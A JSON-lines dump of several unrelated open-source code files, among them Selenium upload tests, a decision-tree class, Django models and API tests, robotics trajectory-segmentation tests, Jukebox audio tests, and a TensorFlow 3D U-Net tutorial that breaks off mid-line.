driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(False, 'Неправильный формат архива')\n\n def test_disk_zip_file_correct(self):\n \"\"\"\n Тест корректного zip-файла, скачиваемого с диска\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'good.zip'))\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n\n def test_disk_file_correct(self):\n \"\"\"\n Тест корректного файла, скачиваемого с диска\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'good.csv'))\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n\n def test_disk_file_bad(self):\n \"\"\"\n Тест некорректного файла, скачиваемого с диска\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'bad.csv'))\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(False, 'Ошибка кодировки')\n\n def test_database(self):\n \"\"\"\n Тест на правильность количества вставляемых записей\n :return:\n \"\"\"\n initial_count = db.session.query(Category.id).count()\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'test_count.csv'))\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n new_count = db.session.query(Category.id).count()\n self.assertEqual(new_count - initial_count, 9)\n\n def is_element_present(self, how, what):\n try:\n self.driver.find_element(by=how, value=what)\n except NoSuchElementException as e:\n return False\n return True\n\n def is_alert_present(self):\n try:\n self.driver.switch_to_alert()\n except NoAlertPresentException as e:\n return False\n return True\n\n def close_alert_and_get_its_text(self):\n try:\n alert = self.driver.switch_to_alert()\n alert_text = alert.text\n if self.accept_next_alert:\n alert.accept()\n else:\n alert.dismiss()\n return alert_text\n finally:\n self.accept_next_alert = True\n\n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"kolotilko/csv_upload","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2947902666","text":"#!/usr/bin/env python3\n\"\"\"Peter Rasmussen, Programming Assignment 3, tree.py\n\nThis module provides the base tree class and the tree error exception class.\n\n\"\"\"\n\n# Standard library imports\nimport collections as c\nimport typing as t\n\n# Local imports\nfrom p3.nodes import ClassificationDecisionNode\n\n\nclass TreeError(Exception):\n pass\n\n\nclass Tree:\n \"\"\"\n Base tree class.\n \"\"\"\n\n def __init__(self):\n self.root: t.Union[ClassificationDecisionNode, None] = None\n self.nodes = c.OrderedDict()\n self.height: t.Union[int, None] = None\n self.node_counter = -1\n\n def __repr__(self):\n return f\"Tree rooted at {self.root}.\"\n\n def add_node(self, node: ClassificationDecisionNode, parent_node: ClassificationDecisionNode = None):\n \"\"\"\n Add node to tree.\n :param node: Node to add\n :param parent_node: Parent node\n \"\"\"\n if self.is_not_empty() and parent_node is None:\n raise TreeError(\"Parent node must be specified when tree is not empty.\")\n\n # Case when tree is empty\n if self.is_empty():\n self.root = node\n node.depth = 0\n self.height = 0\n\n # Case when tree is not empty\n else:\n parent_node.children.append(node)\n node.parent = parent_node\n node.depth = node.parent.depth + 1\n\n node.set_id(self.get_id())\n self.nodes[node.id] = node\n\n # Update tree height\n self.set_height()\n\n def get_height(self) -> int:\n \"\"\"\n Get height of tree.\n :return:Height of tree\n \"\"\"\n if self.is_empty():\n return self.height\n height = 0\n for node_id, node in self.nodes.items():\n if node.depth > height:\n height = node.depth\n self.height = height\n return self.height\n\n def get_id(self):\n self.node_counter += 1\n return self.node_counter\n\n def get_node(self, node_identifier: t.Union[int, str]) -> ClassificationDecisionNode:\n \"\"\"\n Get node by its ID or name.\n :param node_identifier: ID or name of node\n return: Node\n \"\"\"\n if isinstance(node_identifier, int):\n if node_identifier not in self.nodes:\n raise TreeError(f\"Node ID {node_identifier} not in tree.\")\n else:\n return self.nodes[node_identifier]\n elif isinstance(node_identifier, str):\n nodes = [node for node_id, node in self.nodes.items() if node.name == node_identifier]\n if len(nodes) == 0:\n raise TreeError(f\"Node {node_identifier} not in tree.\")\n elif len(nodes) > 1:\n raise TreeError(f\"Duplicate nodes encountered for {node_identifier}.\")\n return nodes[0]\n else:\n raise TypeError(f\"Node is of type {type(node_identifier)} but must be str or int.\")\n\n def is_empty(self) -> bool:\n \"\"\"\n Return true if tree has no nodes.\n :return: True if tree is empty\n \"\"\"\n return self.root is None\n\n def is_not_empty(self) -> bool:\n \"\"\"\n Return true if tree has nodes.\n :return: True if tree is not empty\n \"\"\"\n return self.root is not None\n\n def remove_node(self, node: t.Union[str, int, ClassificationDecisionNode]) -> ClassificationDecisionNode:\n \"\"\"\n Remove node from tree.\n :param node: Node to remove\n :return: Removed node\n \"\"\"\n if self.root is None:\n raise TreeError(\"Cannot remove a node from an empty tree.\")\n if isinstance(node, (int, str)):\n node = self.get_node(node)\n if node.depth < self.height - 1:\n msg = \"Can only remove 1) leaves or 2) nodes whose children are only leaves.\"\n raise NotImplementedError(msg)\n\n # Case when node is root and childless\n if node.is_root() and node.is_leaf():\n self.root = None\n self.height = None\n\n # Case when node is a leaf\n elif node.is_leaf():\n node.parent.children.pop(node.name)\n node.parent = None\n\n # Case when node is interior\n elif node.is_interior():\n # Get node to promote\n _, promoted_node = self.select_promotion_node(node)\n # Decrement promoted node's height\n promoted_node.depth -= 1\n if promoted_node.is_interior():\n raise TreeError(f\"Promoted node {promoted_node} is not a leaf but must be.\")\n # Set node's children to empty dict\n node.children = c.defaultdict(lambda: None)\n # If node is root, make promoted node new root and then set promoted node's parent to None\n if node.is_root():\n self.root = promoted_node\n promoted_node.parent = None\n # Otherwise, add promoted node to parent's children, remove node from parent's children, and update promoted node's parent\n else:\n node.parent.children[promoted_node.name] = promoted_node\n node.parent.children.pop(node.name)\n promoted_node.parent = node.parent\n # Un-wire node's parent\n node.parent = None\n\n # Raise an error if above cases have been incorrectly handled\n else:\n raise TreeError(\"Node must be either interior or a leaf.\")\n\n # Remove node from tree's dictionary of nodes\n self.nodes.pop(node.name)\n # Update tree height\n self.set_height()\n\n # Return removed node\n return node\n\n def set_height(self) -> int:\n \"\"\"\n Set height of tree as height of node which has max height.\n :return: Updated height of tree\n \"\"\"\n self.height = self.get_height()\n return self.height\n\n @staticmethod\n def select_promotion_node(parent_node: ClassificationDecisionNode) -> tuple:\n \"\"\"\n Select child node to promote as parent.\n :param parent_node: Parent node of promotion candidates\n :return: Promoted child node name and associated node\n This is a base function that is over-ridden in classes that inherit from this class.\n \"\"\"\n if not parent_node.children:\n raise TreeError(\"Cannot promote non-existent child from a parent node.\")\n # For this base class, just promote the first node encountered in iteration over dict\n for child_node_name, child_node in parent_node.children.items():\n return child_node_name, child_node","repo_name":"pgr-me/RasmussenMLProject3","sub_path":"p3/trees/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34406938949","text":"from django.db import models\n\n# Create your models here.\nclass Restaurante(models.Model):\n\tnome = models.CharField(max_length=100)\n\tdescricao = models.TextField()\n\t# foto = models.ImageField() # tem que instalar o PIL\n\tpreco_medio = models.FloatField()\n\tqualidade = models.FloatField()\n\n\tdata_cadastro = models.DateTimeField(auto_now_add=True)\n\t# horario_funcionamento = models.DateTimeField()\n\t#seg_abertura = models.TimeField()\n\t#seg_fechamento = models.TimeField()\n\n\tdef __unicode__(self):\n\t\treturn self.nome\n\n\nclass Comentario(models.Model):\n\tautor = models.CharField(max_length=100)\n\tconteudo = models.TextField()\n\trestaurante = models.ForeignKey('Restaurante')\t","repo_name":"ncometti/ESS-project","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24518343001","text":"\"\"\"Tests for low-level trajectory segmentation.\"\"\"\nimport numpy as np\nimport pytest\nfrom gym.spaces import Box\n\nfrom predicators import utils\nfrom predicators.datasets import create_dataset\nfrom predicators.envs import create_new_env\nfrom predicators.ground_truth_models import get_gt_options\nfrom predicators.nsrt_learning.segmentation import segment_trajectory\nfrom predicators.structs import Action, LowLevelTrajectory, \\\n ParameterizedOption, Predicate, State, Type\n\n\ndef test_segment_trajectory():\n \"\"\"Tests for segment_trajectory().\"\"\"\n utils.reset_config({\"segmenter\": \"option_changes\"})\n cup_type = Type(\"cup_type\", [\"feat1\"])\n cup0 = cup_type(\"cup0\")\n cup1 = cup_type(\"cup1\")\n cup2 = cup_type(\"cup2\")\n pred0 = Predicate(\"Pred0\", [cup_type], lambda s, o: s[o[0]][0] > 0.5)\n pred1 = Predicate(\"Pred1\", [cup_type, cup_type],\n lambda s, o: s[o[0]][0] > 0.5)\n pred2 = Predicate(\"Pred2\", [cup_type], lambda s, o: s[o[0]][0] > 0.5)\n preds = {pred0, pred1, pred2}\n state0 = State({cup0: [0.4], cup1: [0.7], cup2: [0.1]})\n atoms0 = utils.abstract(state0, preds)\n state1 = State({cup0: [0.8], cup1: [0.3], cup2: [1.0]})\n atoms1 = utils.abstract(state1, preds)\n # Tests with known options.\n param_option = utils.SingletonParameterizedOption(\n \"Dummy\",\n lambda s, m, o, p: Action(p),\n types=[cup_type],\n params_space=Box(0.1, 1, (1, )),\n )\n option0 = param_option.ground([cup0], np.array([0.2]))\n assert option0.initiable(state0)\n action0 = option0.policy(state0)\n # The option changes, but the option spec stays the same. Want to segment.\n # Note that this is also a test for the case where the final option\n # terminates in the final state.\n option1 = param_option.ground([cup0], np.array([0.1]))\n assert option1.initiable(state0)\n action1 = option1.policy(state0)\n option2 = param_option.ground([cup1], np.array([0.1]))\n assert option2.initiable(state0)\n action2 = option2.policy(state0)\n known_option_ll_traj = LowLevelTrajectory(\n [state0.copy() for _ in range(5)],\n [action0, action1, action2, action0])\n known_option_atom_seq = [atoms0, atoms0, atoms0, atoms0, atoms0]\n known_option_segments = segment_trajectory(known_option_ll_traj, preds,\n known_option_atom_seq)\n assert len(known_option_segments) == 4\n # Test case where the final option does not terminate in the final state.\n infinite_param_option = ParameterizedOption(\n \"InfiniteDummy\",\n types=[cup_type],\n params_space=Box(0.1, 1, (1, )),\n policy=lambda s, m, o, p: Action(p),\n initiable=lambda s, m, o, p: True,\n terminal=lambda s, m, o, p: False,\n )\n infinite_option = infinite_param_option.ground([cup0], np.array([0.2]))\n states = [state0.copy() for _ in range(5)]\n infinite_option.initiable(states[0])\n actions = [infinite_option.policy(s) for s in states[:-1]]\n atom_seq = [atoms0, atoms0, atoms0, atoms0, atoms1]\n assert len(\n segment_trajectory(LowLevelTrajectory(states, actions), preds,\n atom_seq)) == 0\n\n # More tests for temporally extended options.\n def _initiable(s, m, o, p):\n del s, o, p # unused\n m[\"steps_remaining\"] = 3\n return True\n\n def _policy(s, m, o, p):\n del s, o # unused\n m[\"steps_remaining\"] -= 1\n return Action(p)\n\n def _terminal(s, m, o, p):\n del s, o, p # unused\n return m[\"steps_remaining\"] <= 0\n\n three_step_param_option = ParameterizedOption(\n \"ThreeStepDummy\",\n types=[cup_type],\n params_space=Box(0.1, 1, (1, )),\n policy=_policy,\n initiable=_initiable,\n terminal=_terminal,\n )\n\n def _simulate(s, a):\n del a # unused\n return s.copy()\n\n three_option0 = three_step_param_option.ground([cup0], np.array([0.2]))\n three_option1 = three_step_param_option.ground([cup0], np.array([0.2]))\n policy = utils.option_plan_to_policy([three_option0, three_option1])\n traj = utils.run_policy_with_simulator(\n policy,\n _simulate,\n state0,\n termination_function=lambda s: False,\n max_num_steps=6)\n atom_traj = [atoms0] * 3 + [atoms1] * 3 + [atoms0]\n segments = segment_trajectory(traj, preds, atom_traj)\n assert len(segments) == 2\n segment0 = segments[0]\n segment1 = segments[1]\n assert segment0.has_option()\n assert segment0.get_option() == three_option0\n assert segment0.init_atoms == atoms0\n assert segment0.final_atoms == atoms1\n assert segment1.has_option()\n assert segment1.get_option() == three_option1\n assert segment1.init_atoms == atoms1\n assert segment1.final_atoms == atoms0\n\n # Tests without known options.\n action0 = option0.policy(state0)\n action0.unset_option()\n action1 = option0.policy(state0)\n action1.unset_option()\n action2 = option1.policy(state0)\n action2.unset_option()\n # Should crash, because the option_changes segmenter assumes that options\n # are known.\n with pytest.raises(AssertionError):\n segment_trajectory(\n LowLevelTrajectory([state0.copy() for _ in range(5)],\n [action0, action1, action2, action0]), preds,\n [atoms0, atoms0, atoms0, atoms0, atoms0])\n # Test oracle segmenter with known options. Should be the same as option\n # changes segmenter.\n utils.reset_config({\"segmenter\": \"oracle\"})\n known_option_segments = segment_trajectory(known_option_ll_traj, preds,\n known_option_atom_seq)\n assert len(known_option_segments) == 4\n # Segment with atoms changes instead.\n utils.reset_config({\"segmenter\": \"atom_changes\"})\n assert len(\n segment_trajectory(known_option_ll_traj, preds,\n known_option_atom_seq)) == 0\n unknown_option_ll_traj = LowLevelTrajectory(\n [state0.copy() for _ in range(5)] + [state1],\n [action0, action1, action2, action0, action1])\n atom_seq = [atoms0, atoms0, atoms0, atoms0, atoms0, atoms1]\n unknown_option_segments = segment_trajectory(unknown_option_ll_traj, preds,\n atom_seq)\n assert len(unknown_option_segments) == 1\n segment = unknown_option_segments[0]\n assert len(segment.actions) == 5\n assert not segment.has_option()\n assert segment.init_atoms == atoms0\n assert segment.final_atoms == atoms1\n # Test segmenting at every step.\n utils.reset_config({\"segmenter\": \"every_step\"})\n every_step_segments = segment_trajectory(unknown_option_ll_traj, preds,\n atom_seq)\n assert len(every_step_segments) == 5\n # Test oracle segmenter with unknown options. This segmenter uses the\n # ground truth NSRTs, so we need to use a real environment where those\n # are defined.\n utils.reset_config({\n \"segmenter\": \"oracle\",\n \"option_learner\": \"oracle\",\n \"env\": \"cover_multistep_options\",\n \"cover_multistep_thr_percent\": 0.99,\n \"cover_multistep_bhr_percent\": 0.99,\n \"cover_initial_holding_prob\": 0.0,\n \"cover_num_blocks\": 1,\n \"cover_num_targets\": 1,\n \"num_train_tasks\": 1,\n \"offline_data_method\": \"demo\",\n })\n env = create_new_env(\"cover_multistep_options\", do_cache=False)\n train_tasks = [t.task for t in env.get_train_tasks()]\n assert len(train_tasks) == 1\n dataset = create_dataset(env, train_tasks, known_options=set())\n ground_atom_dataset = utils.create_ground_atom_dataset(\n dataset.trajectories, env.predicates)\n assert len(ground_atom_dataset) == 1\n trajectory = ground_atom_dataset[0]\n ll_traj, atoms = trajectory\n assert train_tasks[0].goal.issubset(atoms[-1])\n assert len(ll_traj.actions) > 0\n assert not ll_traj.actions[0].has_option()\n segments = segment_trajectory(ll_traj, env.predicates, atoms)\n # Should be 2 because the hyperparameters force the task to be exactly\n # one pick and one place.\n assert len(segments) == 2\n # Test unknown segmenter.\n utils.reset_config({\"segmenter\": \"not a real segmenter\"})\n with pytest.raises(NotImplementedError):\n segment_trajectory(ll_traj, env.predicates, atoms)\n\n\n@pytest.mark.parametrize(\"env\", [\n \"stick_button\", \"cover_multistep_options\", \"doors\", \"coffee\",\n \"touch_point\", \"blocks\", \"exit_garage\"\n])\ndef test_contact_based_segmentation(env):\n \"\"\"Tests for contact-based segmentation.\"\"\"\n utils.reset_config({\n \"segmenter\": \"contacts\",\n \"env\": env,\n \"num_train_tasks\": 1,\n \"offline_data_method\": \"demo\",\n \"doors_room_map_size\": 2,\n \"doors_min_room_exists_frac\": 1.0,\n \"doors_max_room_exists_frac\": 1.0,\n \"doors_birrt_smooth_amt\": 0,\n \"exit_garage_clear_refine_penalty\": 0,\n \"exit_garage_min_num_obstacles\": 3,\n \"exit_garage_max_num_obstacles\": 3,\n \"exit_garage_raise_environment_failure\": True,\n \"exit_garage_motion_planning_ignore_obstacles\": True,\n # Exclude all predicates, because contact-based segmentation should\n # be invariant to excluded predicates.\n \"excluded_predicates\": \"all\",\n })\n env = create_new_env(env, do_cache=False)\n train_tasks = [t.task for t in env.get_train_tasks()]\n assert len(train_tasks) == 1\n dataset = create_dataset(env, train_tasks, get_gt_options(env.get_name()))\n ground_atom_dataset = utils.create_ground_atom_dataset(\n dataset.trajectories, env.predicates)\n assert len(ground_atom_dataset) == 1\n trajectory = ground_atom_dataset[0]\n ll_traj, atoms = trajectory\n assert train_tasks[0].goal.issubset(atoms[-1])\n assert len(ll_traj.actions) > 0\n assert ll_traj.actions[0].has_option()\n segments = segment_trajectory(ll_traj, env.predicates, atoms)\n # The options should be grouped together.\n for segment in segments:\n assert len(segment.actions) > 0\n segment_option = segment.get_option()\n for action in segment.actions:\n assert action.get_option() is segment_option\n\n\ndef test_contact_based_segmentation_failure_case():\n \"\"\"Failure case tests for contact-based segmentation.\"\"\"\n utils.reset_config({\n \"segmenter\": \"contacts\",\n \"env\": \"not a real env\",\n })\n with pytest.raises(NotImplementedError) as e:\n segment_trajectory([], set(), [])\n assert \"Contact-based segmentation not implemented\" in str(e)\n","repo_name":"Learning-and-Intelligent-Systems/predicators","sub_path":"tests/nsrt_learning/test_segmentation.py","file_name":"test_segmentation.py","file_ext":"py","file_size_in_byte":10588,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"66"} +{"seq_id":"40945793645","text":"import tempfile\nimport unittest\n\nimport librosa\nimport numpy as np\nfrom scipy.io.wavfile import read as wavread\n\nfrom ..assets import retrieve_asset\nfrom ..utils import compute_checksum\nfrom .jukebox import _CHUNK_FRAMES, _SAMPLE_RATE, Jukebox\n\n_TEST_NUM_LAYERS = 36\n\n\nclass TestJukebox(unittest.TestCase):\n def test_singleton(self):\n Jukebox(num_layers=_TEST_NUM_LAYERS)\n with self.assertRaisesRegex(Exception, \"initialized once\"):\n Jukebox(num_layers=1)\n\n def test_decode_audio_strict(self):\n # NOTE: *Very* strict test to check the decoding stack against training config.\n # Versions: ffmpeg 4.3.2-0york0~18.04, librosa 0.7.2, resampy 0.2.2\n audio = Jukebox.decode_audio(retrieve_asset(\"TEST_MP3\"))\n _, audio_ref = wavread(retrieve_asset(\"TEST_MP3_JUKEBOX_DECODE_REF\"))\n self.assertTrue(np.array_equal(audio, audio_ref))\n\n def test_codify_audio(self):\n # NOTE: *Pretty* strict test to check VQVAE against training.\n # Versions: torch 1.4.0+cu101\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS)\n _, audio = wavread(retrieve_asset(\"TEST_MP3_JUKEBOX_DECODE_REF\"))\n audio_codified = jukebox.codify_audio(audio)\n self.assertEqual(audio_codified.shape, (8192,))\n self.assertEqual(np.unique(audio_codified).shape[0], 432)\n self.assertEqual(\n compute_checksum(str(audio_codified.tolist()).encode(\"utf-8\")),\n \"2569ffae9819a43a0e4ba29f3caa5ecab6d4b2a8e1b3fde0a65bbf6532a7e479\",\n )\n self.assertEqual(np.unique(audio_codified[1580:]).tolist(), [653, 1489])\n\n audio_codified_nopad = jukebox._codify_audio(audio, pad=False)\n self.assertEqual(audio_codified_nopad.shape, (1580,))\n eq = audio_codified[: audio_codified_nopad.shape[0]] == audio_codified_nopad\n acc = eq.astype(np.float32).mean()\n self.assertAlmostEqual(acc, 0.9994, places=4)\n\n def test_lm_activations(self):\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS)\n _, audio = wavread(retrieve_asset(\"TEST_MP3_JUKEBOX_DECODE_REF\"))\n audio_codified = jukebox.codify_audio(audio)\n\n audio_activations = jukebox.lm_activations(audio_codified)\n self.assertEqual(audio_activations.shape, (8192, 4800))\n self.assertAlmostEqual(np.abs(audio_activations).mean(), 6.3359, places=4)\n self.assertAlmostEqual(\n np.abs(audio_activations).astype(np.float64).sum(), 249135949.1, places=1\n )\n\n def test_extract(self):\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS, fp16=True)\n mp3_path = retrieve_asset(\"TEST_MP3\")\n rate, audio_activations = jukebox(mp3_path)\n self.assertAlmostEqual(rate, 344.5, places=1)\n self.assertEqual(audio_activations.shape, (1580, 4800))\n self.assertAlmostEqual(np.abs(audio_activations).mean(), 1.7705, places=4)\n self.assertAlmostEqual(\n np.abs(audio_activations).astype(np.float64).sum(), 13425792.4, places=1\n )\n\n def test_edge_cases(self):\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS)\n jukebox(\n retrieve_asset(\"YOUTUBE_ZqJiXLJs_Pg\"),\n offset=281.66999999999996,\n duration=15.360000000000014,\n )\n\n def test_legacy(self):\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS)\n audio = jukebox.decode_audio(retrieve_asset(\"TEST_JUKEBOX_LEGACY\"))\n audio = audio[: 25 * _SAMPLE_RATE]\n codified_audio = jukebox._codify_audio(audio, window_size=25 * _SAMPLE_RATE)\n codified_audio = codified_audio[:_CHUNK_FRAMES]\n activations = jukebox.lm_activations(\n codified_audio, metadata_total_length_seconds=62\n )\n expected = np.load(retrieve_asset(\"TEST_JUKEBOX_LEGACY_REF\"))\n recomputed = np.mean(activations, axis=0)\n err = np.abs(recomputed - expected).sum()\n self.assertLess(err, 0.01)\n","repo_name":"chrisdonahue/sheetsage","sub_path":"sheetsage/representations/jukebox_test.py","file_name":"jukebox_test.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"66"} +{"seq_id":"2470629415","text":"import os\nimport django\n\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"adwile.settings\")\ndjango.setup()\n\nfrom django.test import TestCase\n\nfrom rest_framework.test import APIClient\n\nfrom teaser.models import Teaser\nfrom user.models import User\n\n\nclass TestCaseTeaser(TestCase):\n\n author_username = 'test'\n admin_username = 'admin'\n teaser_title = 'teaser'\n url = 'http://127.0.0.1:8000/api/teaser_status/'\n\n def setUp(self):\n self.client = APIClient()\n\n user = User.objects.create(username=self.author_username)\n Teaser.objects.create(title=self.teaser_title, description='test', category=Teaser.Category.CATEGORY_1, author=user)\n\n def test_author_change_teaser_status(self):\n \"\"\"Смена статуса тизера автором\"\"\"\n\n user = User.objects.get(username=self.author_username)\n teaser = Teaser.objects.get(title=self.teaser_title)\n\n data = {\"teaser_ids\": [teaser.id], \"status_paid\": Teaser.StatusPaid.PAID}\n self.client.force_authenticate(user)\n response = self.client.put(path=self.url, data=data)\n\n self.assertEqual(response.status_code, 403)\n self.assertEqual(response.data['detail'], 'You do not have permission to perform this action.')\n self.assertEqual(teaser.status_paid, Teaser.StatusPaid.UNKNOWN)\n\n def test_admin_change_teaser_status_paid(self):\n \"\"\"Смена статуса тизера админом на PAID\"\"\"\n\n user = User.objects.first()\n teaser = Teaser.objects.get(title=self.teaser_title)\n\n data = {\"teaser_ids\": [teaser.id], \"status_paid\": Teaser.StatusPaid.PAID}\n self.client.force_authenticate(user)\n response = self.client.put(path=self.url, data=data)\n\n teaser.refresh_from_db()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(teaser.status_paid, Teaser.StatusPaid.PAID)\n self.assertEqual(response.data['status'], 'OK')\n self.assertEqual(response.data['teaser_data'][0]['id'], teaser.id)\n\n def test_admin_change_teaser_status_reject(self):\n \"\"\"Смена статуса тизера админом на REJECT\"\"\"\n\n user = User.objects.first()\n teaser = Teaser.objects.get(title=self.teaser_title)\n\n data = {\"teaser_ids\": [teaser.id], \"status_paid\": Teaser.StatusPaid.REJECT}\n self.client.force_authenticate(user)\n response = self.client.put(path=self.url, data=data)\n\n teaser.refresh_from_db()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(teaser.status_paid, Teaser.StatusPaid.REJECT)\n self.assertEqual(response.data['status'], 'OK')\n self.assertEqual(response.data['teaser_data'][0]['id'], teaser.id)\n\n def test_admin_change_paid_teaser_status(self):\n \"\"\"Смена статуса тизера админом на REJECT, когда статус тизера уже установлен\"\"\"\n\n user = User.objects.first()\n teaser = Teaser.objects.get(title=self.teaser_title)\n\n data = {\"teaser_ids\": [teaser.id], \"status_paid\": Teaser.StatusPaid.REJECT}\n self.client.force_authenticate(user)\n self.client.put(path=self.url, data=data)\n data['status_paid'] = Teaser.StatusPaid.PAID\n response = self.client.put(path=self.url, data=data)\n\n teaser.refresh_from_db()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(teaser.status_paid, Teaser.StatusPaid.REJECT)\n\n","repo_name":"DenNavin/adwile","sub_path":"teaser/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"69914054292","text":"# This is a tutorial using TensorFlow 2.x, in particular, low-level TF APIs without high-level Keras\n\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport os\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n\n\nDATA_PATH = './data/datasets-promise12'\nRESULT_PATH = './result' \n\n### Define a few functions for network layers\ndef conv3d(input, filters, downsample=False, activation=True, batch_norm=False):\n if downsample: strides = [1,2,2,2,1]\n else: strides = [1,1,1,1,1]\n y = tf.nn.conv3d(input, filters, strides=strides, padding='SAME')\n if batch_norm: y = batch_norm(y)\n if activation: y = tf.nn.relu(y)\n return y # where bn can be added\n\ndef resnet_block(input, filters, batch_norm=False):\n y = conv3d(input, filters[..., 0])\n y = conv3d(y, filters[..., 1], activation=False) + input\n if batch_norm: y = batch_norm(y)\n return tf.nn.relu(y) # where bn can be added\n\ndef downsample_maxpool(input, filters):\n y = conv3d(input, filters)\n return tf.nn.max_pool3d(y, ksize=[1,3,3,3,1], padding='SAME', strides=[1,2,2,2,1])\n\ndef deconv3d(input, filters, out_shape, batch_norm=False):\n y = tf.nn.conv3d_transpose(input, filters, output_shape=out_shape, strides=[1,2,2,2,1], padding='SAME') \n if batch_norm: y = batch_norm(y)\n return tf.nn.relu(y) # where bn can be added\n\ndef batch_norm(inputs, is_training, decay = 0.999):\n # This is where to insert the implementation of batch normalisaiton\n return inputs\n\ndef add_variable(var_shape, var_list, var_name=None, initialiser=None):\n if initialiser is None:\n initialiser = tf.initializers.glorot_normal()\n if var_name is None:\n var_name = 'var{}'.format(len(var_list))\n var_list.append(tf.Variable(initialiser(var_shape), name=var_name, trainable=True))\n return var_list\n\n### Define a model (the 3D U-Net) with residual layers\n### ref: https://arxiv.org/abs/1512.03385 & https://arxiv.org/abs/1505.04597\n## define all the trinable weights\nnum_channels = 32\nnc = [num_channels*(2**i) for i in range(4)]\nvar_list=[]\n# intial-layer\nvar_list = add_variable([5,5,5,1,nc[0]], var_list)\n# encoder-s0\nvar_list = add_variable([3,3,3,nc[0],nc[0],2], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[0],2], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[0]], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[1]], var_list)\n# encoder-s1\nvar_list = add_variable([3,3,3,nc[1],nc[1],2], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[1],2], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[1]], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[2]], var_list)\n# encoder-s2\nvar_list = add_variable([3,3,3,nc[2],nc[2],2], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[2],2], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[2]], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[3]], var_list)\n# deep-layers-s3\nvar_list = add_variable([3,3,3,nc[3],nc[3],2], var_list)\nvar_list = add_variable([3,3,3,nc[3],nc[3],2], var_list)\nvar_list = add_variable([3,3,3,nc[3],nc[3],2], var_list)\n# decoder-s2\nvar_list = add_variable([3,3,3,nc[2],nc[3]], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[2],2], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[2],2], var_list)\n# decoder-s1\nvar_list = add_variable([3,3,3,nc[1],nc[2]], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[1],2], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[1],2], var_list)\n# decoder-s0\nvar_list = add_variable([3,3,3,nc[0],nc[1]], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[0],2], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[0],2], var_list)\n# output-layer\nvar_list = add_variable([3,3,3,nc[0],1], var_list)\n\n## model with corresponding layers\n@tf.function\ndef residual_unet(input):\n # initial-layer\n skip_layers = []\n layer = conv3d(input, var_list[0])\n # encoder-s0\n layer = resnet_block(layer, var_list[1])\n layer = resnet_block(layer, var_list[2])\n skip_layers.append(layer)\n layer = downsample_maxpool(layer, var_list[3])\n layer = conv3d(layer, var_list[4])\n # encoder-s1\n layer = resnet_block(layer, var_list[5])\n layer = resnet_block(layer, var_list[6])\n skip_layers.append(layer)\n layer = downsample_maxpool(layer, 